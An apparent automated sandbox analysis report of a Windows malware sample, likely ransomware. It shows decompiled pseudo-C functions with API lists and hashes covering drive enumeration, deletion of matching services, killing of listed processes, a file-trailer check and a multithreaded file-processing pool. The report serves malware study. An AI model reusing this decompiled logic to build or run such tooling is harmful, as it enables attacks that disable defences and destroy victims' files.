							if(GetDiskFreeSpaceExW(_t60, 0,  &_v12,  &_v20) == 0) {
								_t60 =  &(_t60[4]); /* query failed: skip this drive root */
							} else {
								if(_t57 == 0) {
									_t57 = _t57 + 1; /* first entry: no separator */
								} else {
									asm("stosw"); /* separator WCHAR before the next entry */
								}
								asm("movsd"); /* copies the 2-WCHAR drive prefix ("X:") into the output and advances _t60 by 2 WCHARs */
								/* 0x40f6a8 is likely a 64-bit division helper (both sizes divided by 0x40000000 = 1 GiB);
								   0x40f69c is a wsprintf-style formatter writing "free/total" with the L"%u/%u" string above. */
								_t52 =  *0x40f69c(_t59,  &_v44,  *0x40f6a8(_v20.LowPart, _v16, 0x40000000, 0,  *0x40f6a8(_v12.LowPart, _v8, 0x40000000, 0)));
								_t61 = _t61 + 8;
								_t59 = _t59 + _t52 * 2; /* advance the output pointer by the number of WCHARs written */
								_t60 =  &(_t60[2]);     /* together with movsd: next 4-WCHAR drive root */
							}
						} else {
							_t60 =  &(_t60[4]);
						}
						_v28 = _v28 - 1;
					} while (_v28 != 0);
					_v24 = RtlReAllocateHeap( *0x40f5d6, 0, _v24, 2 + wcslen(_v24) * 2); /* shrink the buffer to the final string length plus terminator */
				} else {
				}
			} else {
			}
		} else {
		}
	} else {
	}
	return _v24;
}

Instruction address range: 0x00407d96 - 0x00407eec
                                                                                        0x00000000
                                                                                        0x00407dd1
                                                                                        0x00000000
                                                                                        0x00407dad
                                                                                        0x00407efa

                                                                                        APIs
                                                                                        • GetLogicalDriveStringsW.KERNEL32(00000000,00000000,?,00000000,?,?,00000000), ref: 00407DA1
                                                                                        • RtlAllocateHeap.NTDLL(00000008,00000000), ref: 00407DC2
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp
                                                                                        Similarity
                                                                                        • API ID: AllocateDriveHeapLogicalStrings
                                                                                        • String ID:
                                                                                        • API String ID: 1399632231-0
                                                                                        • Opcode ID: fe186e1c3b3471462df1a70b8213717ead9c17b0c5c4698b4361782092673927
                                                                                        • Instruction ID: 05f4f3b8232e19daf0ced0677554b8691ecacac32b18da1b9a772accac604e03
                                                                                        • Opcode Fuzzy Hash: fe186e1c3b3471462df1a70b8213717ead9c17b0c5c4698b4361782092673927
                                                                                        • Instruction Fuzzy Hash: 56417F71D05209AFDB209F90DD45BAFBB78FB18301F100436E901B22A0D7756D19CBAA
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 79%
                                                                                        			E004046E2() {
                                                                                        				void* _v8;
                                                                                        				void* _v12;
                                                                                        				void* _v16;
                                                                                        				long _v20;
                                                                                        				char _v24;
                                                                                        				struct _SERVICE_STATUS _v52;
                                                                                        				int _t34;
                                                                                        				short** _t46;
                                                                                        				void* _t47;
                                                                                        
                                                                                        				_v8 = 0;
                                                                                        				_v16 = 0;
                                                                                        				_t34 = OpenSCManagerW(0, 0, 4);
                                                                                        				_v8 = _t34;
                                                                                        				if(_v8 == 0) {
                                                                                        					L8:
                                                                                        					if(_v8 != 0) {
                                                                                        						_t34 = CloseServiceHandle(_v8);
                                                                                        					}
                                                                                        					if(_v16 == 0) {
                                                                                        						return _t34;
                                                                                        					} else {
                                                                                        						return RtlFreeHeap( *0x40f5d6, 0, _v16);
                                                                                        					}
                                                                                        				}
                                                                                        				_v20 = 0;
                                                                                        				 *0x40f7ec(_v8, 0, 0x30, 3, 0, _v20,  &_v20,  &_v24, 0, 0);
                                                                                        				_t34 = RtlAllocateHeap( *0x40f5d6, 8, _v20);
                                                                                        				_v16 = _t34;
                                                                                        				if(_v16 == 0) {
                                                                                        					goto L8;
                                                                                        				}
                                                                                        				_t34 =  *0x40f7ec(_v8, 0, 0x30, 3, _v16, _v20,  &_v20,  &_v24, 0, 0);
                                                                                        				if(_t34 == 0) {
                                                                                        					goto L8;
                                                                                        				}
                                                                                        				_t46 = _v16;
                                                                                        				do {
                                                                                        					_t34 = E00404812( *_t46);
                                                                                        					if(_t34 != 0) {
                                                                                        						_t34 = OpenServiceW(_v8,  *_t46, 0x10020);
                                                                                        						_v12 = _t34;
                                                                                        						if(_v12 != 0) {
                                                                                        							memset( &_v52, 0, 0x1c);
                                                                                        							_t47 = _t47 + 0xc;
                                                                                        							ControlService(_v12, 1,  &_v52);
                                                                                        							DeleteService(_v12);
                                                                                        							_t34 = CloseServiceHandle(_v12);
                                                                                        						}
                                                                                        					}
                                                                                        					_t46 =  &(_t46[0xb]);
                                                                                        					_v24 = _v24 - 1;
                                                                                        				} while (_v24 != 0);
                                                                                        				goto L8;
                                                                                        			}

                                                                                        APIs
                                                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000004,?,?,?,?,00000000), ref: 00404701
                                                                                        • EnumServicesStatusExW.ADVAPI32(00000000,00000000,00000030,00000003,00000000,00000000,00000000,?,00000000,00000000,?,?,?,?,00000000), ref: 00404735
                                                                                        • RtlAllocateHeap.NTDLL(00000008,00000000), ref: 00404746
                                                                                        • EnumServicesStatusExW.ADVAPI32(00000000,00000000,00000030,00000003,00000000,00000000,00000000,?,00000000,00000000,?,?,?,?,00000000), ref: 00404774
                                                                                          • Part of subcall function 00404812: _wcslwr.NTDLL ref: 0040482F
                                                                                          • Part of subcall function 00404812: wcsstr.NTDLL ref: 0040483C
                                                                                        • OpenServiceW.ADVAPI32(00000000,00000000,00010020,00000000,?,?,?,?,00000000), ref: 00404796
                                                                                        • memset.NTDLL ref: 004047AD
                                                                                        • ControlService.ADVAPI32(00000000,00000001,?,?,?,00000000), ref: 004047BF
                                                                                        • DeleteService.ADVAPI32(00000000,?,?,00000000), ref: 004047C8
                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,00000000), ref: 004047D1
                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,00000000), ref: 004047EC
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 00404803
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp
                                                                                        Similarity
                                                                                        • API ID: Service$CloseEnumHandleHeapOpenServicesStatus$AllocateControlDeleteFreeManager_wcslwrmemsetwcsstr
                                                                                        • String ID:
                                                                                        • API String ID: 1445065125-0
                                                                                        • Opcode ID: 4cc05fddb3bf86c26c3dd707e134e0c0fb8ea13cf5960c70125b0902bb28b876
                                                                                        • Instruction ID: 7b21f04274218579ce4f942442c5d077116fc12ed2bb66dee62ae09e5a85a8a4
                                                                                        • Opcode Fuzzy Hash: 4cc05fddb3bf86c26c3dd707e134e0c0fb8ea13cf5960c70125b0902bb28b876
                                                                                        • Instruction Fuzzy Hash: 2541F571940209FBEB219B90DD0ABAEBB79FB48701F204076F600B65E0D7B51A58EB59
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 100%
                                                                                        			E00401B91(wchar_t* _a4) {
                                                                                        				union _FINDEX_INFO_LEVELS _v8;
                                                                                        				void* _v12;
                                                                                        				long _v16;
                                                                                        				void* _v20;
                                                                                        				struct _WIN32_FIND_DATAW _v612;
                                                                                        				intOrPtr* _t41;
                                                                                        
                                                                                        				_v8 = 1;
                                                                                        				_v20 = 0;
                                                                                        				if(_a4 == 0) {
                                                                                        					L10:
                                                                                        					return _v8;
                                                                                        				}
                                                                                        				_v20 = RtlAllocateHeap( *0x40f5d6, 8, 6 + wcslen(_a4) * 2);
                                                                                        				if(_v20 == 0) {
                                                                                        					L8:
                                                                                        					if(_v20 != 0) {
                                                                                        						RtlFreeHeap( *0x40f5d6, 0, _v20);
                                                                                        					}
                                                                                        					goto L10;
                                                                                        				}
                                                                                        				wcscpy(_v20, _a4);
                                                                                        				E00401A3A(_v20);
                                                                                        				_v16 = 0x2a;
                                                                                        				wcscat(_v20,  &_v16);
                                                                                        				_v12 = FindFirstFileExW(_v20, 0,  &_v612, 0, 0, 0);
                                                                                        				if(_v12 == 0xffffffff) {
                                                                                        					goto L8;
                                                                                        				} else {
                                                                                        					goto L3;
                                                                                        				}
                                                                                        				while(1) {
                                                                                        					L3:
                                                                                        					_t41 =  &(_v612.cFileName);
                                                                                        					if( *_t41 != 0x2e &&  *_t41 != 0x2e002e) {
                                                                                        						break;
                                                                                        					}
                                                                                        					if(FindNextFileW(_v12,  &_v612) != 0) {
                                                                                        						continue;
                                                                                        					}
                                                                                        					L7:
                                                                                        					FindClose(_v12);
                                                                                        					goto L8;
                                                                                        				}
                                                                                        				_v8 = 0;
                                                                                        				goto L7;
                                                                                        			}

                                                                                        APIs
                                                                                        • wcslen.NTDLL ref: 00401BBA
                                                                                        • RtlAllocateHeap.NTDLL(00000008,00000000,?), ref: 00401BD3
                                                                                        • wcscpy.NTDLL ref: 00401BEC
                                                                                          • Part of subcall function 00401A3A: wcslen.NTDLL ref: 00401A49
                                                                                        • wcscat.NTDLL ref: 00401C0B
                                                                                        • FindFirstFileExW.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00401C26
                                                                                        • FindNextFileW.KERNEL32(000000FF,?), ref: 00401C5B
                                                                                        • FindClose.KERNEL32(000000FF), ref: 00401C68
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 00401C7F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp
                                                                                        Similarity
                                                                                        • API ID: Find$FileHeapwcslen$AllocateCloseFirstFreeNextwcscatwcscpy
                                                                                        • String ID: *
                                                                                        • API String ID: 3715368164-163128923
                                                                                        • Opcode ID: 5bb33ceab6d48ddc35f9fabd0b86a1041bd89a4ab9340b049d53e8b49033b090
                                                                                        • Instruction ID: 6ab97323bd2829a0b91d296578501e68c6c48c4c000942d48e46d5a9f2b85c6b
                                                                                        • Opcode Fuzzy Hash: 5bb33ceab6d48ddc35f9fabd0b86a1041bd89a4ab9340b049d53e8b49033b090
                                                                                        • Instruction Fuzzy Hash: 8C316670944218EFEB209F94DD4CBAEBBB8FB04301F000576F811B11B0D7B65AA9DB59
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 68%
                                                                                        			E00405C1C(WCHAR* _a4) {
                                                                                        				struct _OVERLAPPED* _v8;
                                                                                        				void* _v12;
                                                                                        				long _v16;
                                                                                        				char _v32;
                                                                                        				void _v160;
                                                                                        				void* _t31;
                                                                                        
                                                                                        				_v8 = 0;
                                                                                        				_v12 = 0xffffffff;
                                                                                        				if(SetFileAttributesW(_a4, 0x80) != 0) {
                                                                                        					while(1) {
                                                                                        						_v12 = CreateFileW(_a4, 0xc0000000, 0, 0, 3, 0xa000080, 0);
                                                                                        						if(_v12 != 0xffffffff) {
                                                                                        							break;
                                                                                        						}
                                                                                        						if( *[fs:0x34] != 0x20) {
                                                                                        							return 0xffffffff;
                                                                                        						} else {
                                                                                        							if(PathIsNetworkPathW(_a4) == 0) {
                                                                                        								if(E004056D4(_a4) == 0) {
                                                                                        									return 0xffffffff;
                                                                                        								} else {
                                                                                        									continue;
                                                                                        								}
                                                                                        							} else {
                                                                                        								return 0xffffffff;
                                                                                        							}
                                                                                        						}
                                                                                        						goto L22;
                                                                                        					}
                                                                                        					asm("sbb edx, 0x0");
                                                                                        					_push(2);
                                                                                        					if(SetFilePointerEx(_v12, 0xffffffffffffff70, 0, 0) != 0) {
                                                                                        						if(ReadFile(_v12,  &_v160, 0x90,  &_v16, 0) != 0) {
                                                                                        							_t31 = E00401060( &_v160, 0x80, 0);
                                                                                        							_push(0x10);
                                                                                        							_push( &_v32);
                                                                                        							_push(_t31);
                                                                                        							if( *0x40f670() == 0) {
                                                                                        								_v8 = 1;
                                                                                        							}
                                                                                        						} else {
                                                                                        							_v8 =  *[fs:0x34];
                                                                                        						}
                                                                                        					} else {
                                                                                        						if( *[fs:0x34] != 0x83) {
                                                                                        							_v8 =  *[fs:0x34];
                                                                                        						}
                                                                                        					}
                                                                                        					goto L19;
                                                                                        				} else {
                                                                                        					_v8 =  *[fs:0x34];
                                                                                        					L19:
                                                                                        					if(_v12 != 0xffffffff) {
                                                                                        						NtClose(_v12);
                                                                                        					}
                                                                                        					return _v8;
                                                                                        				}
                                                                                        				L22:
                                                                                        			}









                                                                                        0x00405c2a
                                                                                        0x00405c31
                                                                                        0x00405c48
                                                                                        0x00405c58
                                                                                        0x00405c73
                                                                                        0x00405c7a
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00405c84
                                                                                        0x00405cd0
                                                                                        0x00405c86
                                                                                        0x00405c91
                                                                                        0x00405cad
                                                                                        0x00405cbe
                                                                                        0x00405caf
                                                                                        0x00000000
                                                                                        0x00405caf
                                                                                        0x00405c93
                                                                                        0x00405ca0
                                                                                        0x00405ca0
                                                                                        0x00405c91
                                                                                        0x00000000
                                                                                        0x00405c84
                                                                                        0x00405ce0
                                                                                        0x00405ce3
                                                                                        0x00405cf4
                                                                                        0x00405d2b
                                                                                        0x00405d46
                                                                                        0x00405d4d
                                                                                        0x00405d52
                                                                                        0x00405d53
                                                                                        0x00405d5f
                                                                                        0x00405d61
                                                                                        0x00405d61
                                                                                        0x00405d2d
                                                                                        0x00405d33
                                                                                        0x00405d33
                                                                                        0x00405cf6
                                                                                        0x00405d01
                                                                                        0x00405d09
                                                                                        0x00405d09
                                                                                        0x00405d0c
                                                                                        0x00000000
                                                                                        0x00405c4a
                                                                                        0x00405c50
                                                                                        0x00405d68
                                                                                        0x00405d6c
                                                                                        0x00405d71
                                                                                        0x00405d71
                                                                                        0x00405d82
                                                                                        0x00405d82
                                                                                        0x00000000

                                                                                        APIs
                                                                                        • SetFileAttributesW.KERNEL32(FFFFFFFF,00000080,00000000,?,?,?,?), ref: 00405C40
                                                                                        • CreateFileW.KERNEL32(FFFFFFFF,C0000000,00000000,00000000,00000003,0A000080,00000000,?,?,?,?), ref: 00405C6D
                                                                                        • PathIsNetworkPathW.SHLWAPI(000000FF,?,?,?,?), ref: 00405C89
                                                                                        • NtClose.NTDLL(000000FF), ref: 00405D71
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp
                                                                                        Similarity
                                                                                        • API ID: FilePath$AttributesCloseCreateNetwork
                                                                                        • String ID: 7i@
                                                                                        • API String ID: 3671890030-478591865
                                                                                        • Opcode ID: cf3ac0fa73f10cbcd365883bd56ff140fd0d9c445b960b42ebe3a4dcfcf0f0e1
                                                                                        • Instruction ID: 52bbefc15f8ddbc189afc50005a0517713c68715ee7d1ee3340e77ccf8934772
                                                                                        • Opcode Fuzzy Hash: cf3ac0fa73f10cbcd365883bd56ff140fd0d9c445b960b42ebe3a4dcfcf0f0e1
                                                                                        • Instruction Fuzzy Hash: 8841D632604608EFEB208B64ED05BAFB7B8EB40761F208277F510F62D0D7355A45DA69
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 90%
                                                                                        			E004069E1(WCHAR* _a4) {
                                                                                        				unsigned int _v8;
                                                                                        				long _v12;
                                                                                        				void* _v268;
                                                                                        				void* _t22;
                                                                                        				void* _t29;
                                                                                        				intOrPtr _t31;
                                                                                        				void* _t32;
                                                                                        				long _t33;
                                                                                        				unsigned int _t35;
                                                                                        				void* _t42;
                                                                                        
                                                                                        				_v8 = 0;
                                                                                        				 *0x40f9ec = 0;
                                                                                        				 *0x40f9f0 = 0;
                                                                                        				_t31 =  *0x40f5de; // 0x4
                                                                                        				_t32 =  >  ? 0x20 : _t31;
                                                                                        				if(E004016D2() <= 0x3c) {
                                                                                        					_v12 = 0;
                                                                                        				} else {
                                                                                        					_v12 = 2;
                                                                                        				}
                                                                                        				_t22 = CreateIoCompletionPort(0xffffffff, 0, 0, 0);
                                                                                        				 *0x40f9e8 = _t22;
                                                                                        				if( *0x40f9e8 != 0) {
                                                                                        					do {
                                                                                        						CreateThread(0, 0,  &M004059B7, 0, 0, 0);
                                                                                        						asm("stosd");
                                                                                        						_v8 = _v8 + 1;
                                                                                        						CreateThread(0, 0,  &M004059B7, 0, 0, 0);
                                                                                        						asm("stosd");
                                                                                        						_v8 = _v8 + 1;
                                                                                        						_t32 = _t32 - 1;
                                                                                        					} while (_t32 != 0);
                                                                                        					E004066AC(_a4, _v12);
                                                                                        					_t33 =  *0x40f9ec; // 0x0
                                                                                        					while(1) {
                                                                                        						_t42 = _t33 -  *0x40f9f0; // 0x0
                                                                                        						if(_t42 == 0) {
                                                                                        							break;
                                                                                        						}
                                                                                        						Sleep(0x64);
                                                                                        					}
                                                                                        					_t35 = _v8 >> 1;
                                                                                        					do {
                                                                                        						PostQueuedCompletionStatus( *0x40f9e8, 0, 0, 0);
                                                                                        						PostQueuedCompletionStatus( *0x40f9e8, 0, 0, 0);
                                                                                        						_t35 = _t35 - 1;
                                                                                        					} while (_t35 != 0);
                                                                                        					_t29 = WaitForMultipleObjects(_v8,  &_v268, 1, 0xffffffff);
                                                                                        					do {
                                                                                        						asm("lodsd");
                                                                                        						_t29 = NtClose(_t29);
                                                                                        						_v8 = _v8 - 1;
                                                                                        					} while (_v8 != 0);
                                                                                        					return NtClose( *0x40f9e8);
                                                                                        				}
                                                                                        				return _t22;
                                                                                        			}













                                                                                        0x004069ef
                                                                                        0x004069f6
                                                                                        0x00406a00
                                                                                        0x00406a0a
                                                                                        0x00406a17
                                                                                        0x00406a22
                                                                                        0x00406a2d
                                                                                        0x00406a24
                                                                                        0x00406a24
                                                                                        0x00406a24
                                                                                        0x00406a3c
                                                                                        0x00406a42
                                                                                        0x00406a4e
                                                                                        0x00406a5a
                                                                                        0x00406a69
                                                                                        0x00406a6f
                                                                                        0x00406a70
                                                                                        0x00406a82
                                                                                        0x00406a88
                                                                                        0x00406a89
                                                                                        0x00406a8c
                                                                                        0x00406a8d
                                                                                        0x00406a97
                                                                                        0x00406a9c
                                                                                        0x00406aac
                                                                                        0x00406aac
                                                                                        0x00406ab2
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406aa6
                                                                                        0x00406aa6
                                                                                        0x00406ab7
                                                                                        0x00406ab9
                                                                                        0x00406ac5
                                                                                        0x00406ad7
                                                                                        0x00406add
                                                                                        0x00406ade
                                                                                        0x00406af0
                                                                                        0x00406afc
                                                                                        0x00406afc
                                                                                        0x00406afe
                                                                                        0x00406b04
                                                                                        0x00406b07
                                                                                        0x00000000
                                                                                        0x00406b13
                                                                                        0x00406b21

                                                                                        APIs
                                                                                        • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,00000000,?,?,?,?,00000000), ref: 00406A3C
                                                                                        • CreateThread.KERNEL32(00000000,00000000,004059B7,00000000,00000000,00000000), ref: 00406A69
                                                                                        • CreateThread.KERNEL32(00000000,00000000,004059B7,00000000,00000000,00000000), ref: 00406A82
                                                                                        • Sleep.KERNEL32(00000064,00000000,00000000,?,?,?,?,00000000), ref: 00406AA6
                                                                                        • PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,?,?,?,?,00000000), ref: 00406AC5
                                                                                        • PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,?,?,?,?,00000000), ref: 00406AD7
                                                                                        • WaitForMultipleObjects.KERNEL32(00000000,?,00000001,000000FF,?,?,?,?,00000000), ref: 00406AF0
                                                                                        • NtClose.NTDLL(00000000), ref: 00406AFE
                                                                                        • NtClose.NTDLL ref: 00406B13
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp
                                                                                        Similarity
                                                                                        • API ID: CompletionCreate$ClosePostQueuedStatusThread$MultipleObjectsPortSleepWait
                                                                                        • String ID:
                                                                                        • API String ID: 3633580606-0
                                                                                        • Opcode ID: 056b8717cc3ed2e8911cffa5a95cd8b0457347a69ae6303a75ded4c3762f9ed2
                                                                                        • Instruction ID: 0a42052cba57e97a3e8f719e6b38bf7a2cfbbc2a083453ee87ca424c5327b4bf
                                                                                        • Opcode Fuzzy Hash: 056b8717cc3ed2e8911cffa5a95cd8b0457347a69ae6303a75ded4c3762f9ed2
                                                                                        • Instruction Fuzzy Hash: 8A3149B0641304BBEB20AB94EE4AB9A7B74EB10711F200176F6017A5E1C7B529999F1D
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 100%
                                                                                         			E00408016() {
                                                                                         				void* _v8;
                                                                                         				void* _v12;
                                                                                         				int _v16;
                                                                                         				int _v20;
                                                                                         				int _v24;
                                                                                         				short* _v28;
                                                                                         				short* _v32;
                                                                                         				short* _v36;
                                                                                         				long _v52;
                                                                                         				long _t43;
                                                                                         
                                                                                         				_v8 = 0;
                                                                                         				// E00401D08 builds each string on the heap from the encoded blob at the given
                                                                                         				// address: the key path, then two candidate value names. The plaintext is not
                                                                                         				// visible in this listing.
                                                                                         				_v28 = E00401D08(0x40ef14);
                                                                                         				_v32 = E00401D08(0x40ef50);
                                                                                         				_v36 = E00401D08(0x40ef6a);
                                                                                         				// 0x80000001 = HKEY_CURRENT_USER, 0x20119 = KEY_READ | KEY_WOW64_64KEY.
                                                                                         				// RegCreateKeyExW opens the key if it exists and creates it otherwise.
                                                                                         				if(RegCreateKeyExW(0x80000001, _v28, 0, 0, 0, 0x20119, 0,  &_v12,  &_v24) == 0) {
                                                                                         					_v16 = 1;      // expected type REG_SZ
                                                                                         					_v20 = 0x10;   // size of the 16-byte stack buffer at _v52
                                                                                         					_t43 = RegQueryValueExW(_v12, _v32, 0,  &_v16,  &_v52,  &_v20);
                                                                                         					if(_t43 != 0) {
                                                                                         						// first value name missing (or too large): fall back to the second one
                                                                                         						_t43 = RegQueryValueExW(_v12, _v36, 0,  &_v16,  &_v52,  &_v20);
                                                                                         					}
                                                                                         					if(_t43 == 0) {
                                                                                         						// copy the value into a zeroed heap block (HEAP_ZERO_MEMORY = 8) of the returned size
                                                                                         						_v8 = RtlAllocateHeap( *0x40f5d6, 8, _v20);
                                                                                         						if(_v8 != 0) {
                                                                                         							wcscpy(_v8,  &_v52);
                                                                                         						}
                                                                                         					}
                                                                                         					NtClose(_v12);
                                                                                         				}
                                                                                         				RtlFreeHeap( *0x40f5d6, 0, _v28);
                                                                                         				RtlFreeHeap( *0x40f5d6, 0, _v32);
                                                                                         				RtlFreeHeap( *0x40f5d6, 0, _v36);
                                                                                         				return _v8;   // heap copy of the value, or 0 when neither value could be read
                                                                                         			}

                                                                                        APIs
                                                                                          • Part of subcall function 00401D08: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 00401D1E
                                                                                        • RegCreateKeyExW.ADVAPI32(80000001,0040EDCE,00000000,00000000,00000000,00020119,00000000,?,?,0040EF6A,0040EF50,0040EF14,?,00000000), ref: 0040806C
                                                                                        • RegQueryValueExW.ADVAPI32(?,00408406,00000000,00000001,?,00000010,?,00000000,?,?,00000000), ref: 00408098
                                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000001,?,00000010,?,00000000,?,?,00000000), ref: 004080B6
                                                                                        • RtlAllocateHeap.NTDLL(00000008,00000010), ref: 004080CB
                                                                                        • wcscpy.NTDLL ref: 004080E1
                                                                                        • NtClose.NTDLL(?), ref: 004080ED
                                                                                        • RtlFreeHeap.NTDLL(00000000,0040EDCE), ref: 004080FE
                                                                                        • RtlFreeHeap.NTDLL(00000000,00408406), ref: 0040810F
                                                                                        • RtlFreeHeap.NTDLL(00000000,?), ref: 00408120
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp
                                                                                         • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp
                                                                                         • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp
                                                                                         • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp
                                                                                         • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp
                                                                                        Similarity
                                                                                        • API ID: Heap$Free$AllocateQueryValue$CloseCreatewcscpy
                                                                                        • String ID:
                                                                                        • API String ID: 2243750011-0
                                                                                        • Opcode ID: 55728d4458d18e7443d7add074612f363d0046d66f9c92ce34b80a0e72f93bcc
                                                                                        • Instruction ID: f85d4f3be994af5f6a630e198cef73a289d7a9748beffedbe7bb81f6d4c47346
                                                                                        • Opcode Fuzzy Hash: 55728d4458d18e7443d7add074612f363d0046d66f9c92ce34b80a0e72f93bcc
                                                                                        • Instruction Fuzzy Hash: 6331D872940209BFDB219FD1EE06FEEBB78FB08701F10403AF601B55A0DB7566199B59
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 86%
                                                                                         			E00404878() {
                                                                                         				void* _v8;
                                                                                         				long _v12;
                                                                                         				void* _v16;
                                                                                         				long _v20;
                                                                                         				void* _v24;
                                                                                         				void* _v48;
                                                                                         				long _t32;
                                                                                         				intOrPtr* _t44;
                                                                                         				intOrPtr* _t45;
                                                                                         				intOrPtr _t46;
                                                                                         
                                                                                         				_v12 = 0x400;
                                                                                         				_v16 = RtlAllocateHeap( *0x40f5d6, 0, _v12);
                                                                                         				// 5 = SystemProcessInformation. Grow the buffer until the process snapshot fits.
                                                                                         				while(1) {
                                                                                         					_t32 = NtQuerySystemInformation(5, _v16, _v12,  &_v12);
                                                                                         					if(_t32 == 0) {
                                                                                         						break;
                                                                                         					}
                                                                                         					// 0xc0000004 = STATUS_INFO_LENGTH_MISMATCH; _v12 now holds the required size.
                                                                                         					// Any other failure frees the buffer and gives up.
                                                                                         					if(_t32 != 0xc0000004) {
                                                                                         						return RtlFreeHeap( *0x40f5d6, 0, _v16);
                                                                                         					} else {
                                                                                         						_v16 = RtlReAllocateHeap( *0x40f5d6, 0, _v16, _v12);
                                                                                         						continue;
                                                                                         					}
                                                                                         				}
                                                                                         				// Walk the SYSTEM_PROCESS_INFORMATION chain (32-bit layout):
                                                                                         				//   +0x00 NextEntryOffset, +0x3c ImageName.Buffer, +0x44 UniqueProcessId.
                                                                                         				_t44 = _v16;
                                                                                         				do {
                                                                                         					_t46 =  *_t44;
                                                                                         					// Skip entries without an image name (the idle process); E00404993 decides
                                                                                         					// whether the name is one of the processes to kill.
                                                                                         					if( *((intOrPtr*)(_t44 + 0x3c)) != 0 && E00404993( *((intOrPtr*)(_t44 + 0x3c))) != 0) {
                                                                                         						_v24 =  *((intOrPtr*)(_t44 + 0x44));   // CLIENT_ID.UniqueProcess
                                                                                         						_v20 = 0;                               // CLIENT_ID.UniqueThread
                                                                                         						_t45 =  &_v48;
                                                                                         						 *_t45 = 0x18;                          // OBJECT_ATTRIBUTES.Length; remaining fields zero
                                                                                         						 *(_t45 + 4) = 0;
                                                                                         						 *(_t45 + 8) = 0;
                                                                                         						 *(_t45 + 0xc) = 0;
                                                                                         						 *(_t45 + 0x10) = 0;
                                                                                         						 *(_t45 + 0x14) = 0;
                                                                                         						// 1 = PROCESS_TERMINATE; *0x40f708 is the resolved NtTerminateProcess (see APIs below)
                                                                                         						if(NtOpenProcess( &_v8, 1,  &_v48,  &_v24) == 0) {
                                                                                         							 *0x40f708(_v8, 0);
                                                                                         							NtClose(_v8);
                                                                                         						}
                                                                                         					}
                                                                                         					_t44 = _t44 + _t46;
